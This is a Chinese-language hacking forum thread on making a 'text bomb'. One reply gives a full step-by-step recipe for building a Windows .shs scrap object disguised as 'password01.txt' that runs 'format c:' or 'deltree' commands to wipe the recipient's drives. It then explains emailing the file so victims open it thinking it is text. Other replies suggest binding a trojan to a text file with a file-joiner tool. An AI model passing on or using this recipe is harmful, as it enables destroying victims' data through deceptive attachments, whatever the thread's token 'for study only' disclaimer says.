20CN网络安全小组论坛 - 菜鸟乐园 - 如何制做文本炸弹！！！！

论坛: 菜鸟乐园标题: 如何制做文本炸弹！！！！

复制本贴地址

作者: .T. [jtm]

论坛用户

！！？？？下载也可以1！！！
　主要是过程1！！

地主发表时间: 03/07 17:30

回复: studio [studio]

论坛用户

用文件合并的软件把木马和文本和在一起，然后……

B1层发表时间: 03/08 12:06

回复: laievf [laievf]

论坛用户

1.创建一个只包含一个空格(为了减小文件体积)的文本文件，任意取名。
　　2.打开｛写字板文档｝，将此文件拖放入｛写字板文档｝。也可以点击记｛写字板文档｝单栏中的“插入\对象”，弹出“插入对象”对话框，选中“从文件创建”，然后点击“浏览”按钮选择要插入的文件。
　　3.选中该插入对象的图标，选择菜单栏中的“编辑\包对象\编辑包”(如图1)。在弹出的“对象包装程序”对话框中，选择菜单栏中的“编辑\命令行”，然后输入如下命令：start.exe /m format c:/q /autotest /u ，点击“确定”，此时，内容栏中会显示出命令内容。
　　4.点击外观栏中的“插入图标”按钮，会弹出一个警告对话框，确认，然后任选一个图标。
　　5.选择菜单栏中的“编辑\卷标”，为此嵌入对象取一个名称(会替换原来的文件名称)。点击“文件”菜单中的“更新”，然后关闭此对话框。
　　6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”（在2000下的默认名为＂片段＂），现在我们把它改成“password01.txt”。打开电子邮件程序将桌面上的“password01.txt”作为附件发出，或者将含有嵌入对象(带有恶意命令)的文档作为附件发出。
　　7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文所述，“.SHS”扩展名永远是隐藏的)放心地打开时，或打开文件，点击文件中的嵌入对象时触发恶意命令(弹出DOS运行窗口，执行格式化命令)．如果将上面的命令替换为：start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 则是将删除对方硬盘下所有文件（盘符根据实际情况自定义）；如果替换为：start.exe /m deltree /y c:\windows\system\*.* 则是删除对方c:\windows\system\目录底下的所有文件．（当然大家可以改成其它的命令）
　　真的很简单，就这样一个恶意的攻击程序被弄出来了，太可怕了！
（切记：仅供学习与研究，切莫用来攻击他人，更不要在没有安全准备的情况下执行上面的文件，呵呵！）

B2层发表时间: 03/08 13:58

回复: baboo [baboo]

论坛用户

请问，文件合并的话，是不是多后缀的啊。如一个文本文件和一个木马合并，后缀是txt文件还是exe文件，还是既有txt又有exe？

B3层发表时间: 03/08 14:10

回复: playopy [playopy]

论坛用户

管用吗/
有机会我一定试啊

B4层发表时间: 03/08 14:50

回复: laievf [laievf]

论坛用户

后缀是.SHS，但是永远隐藏

B5层发表时间: 03/08 15:57

回复: studio [studio]

论坛用户

txt

B6层发表时间: 03/08 22:02

回复: studio [studio]

论坛用户

txt

B7层发表时间: 03/08 22:03

回复: dengzitui [dengzitui]

论坛用户

这是前一段时间吵的很凶的碎片攻击

B8层发表时间: 03/08 22:10

回复: laievf [laievf]

论坛用户

摇摆猪：txt
我说应该是
文件名.txt.shs
但是.shs的后缀永远隐藏

B9层发表时间: 03/09 07:23

回复: jtm [jtm]

论坛用户

太好了1

B10层发表时间: 03/15 14:59

回复: wolf8 [wolf8]

论坛用户

是的，文件合并都是以你的主文件的扩展名为准

B11层发表时间: 03/15 15:19

回复: Ronaldo [hingiscs]

论坛用户

我也是刚刚来的什么也不懂啊!望大家多多指点指点!!1

B12层发表时间: 03/15 22:15

论坛: 菜鸟乐园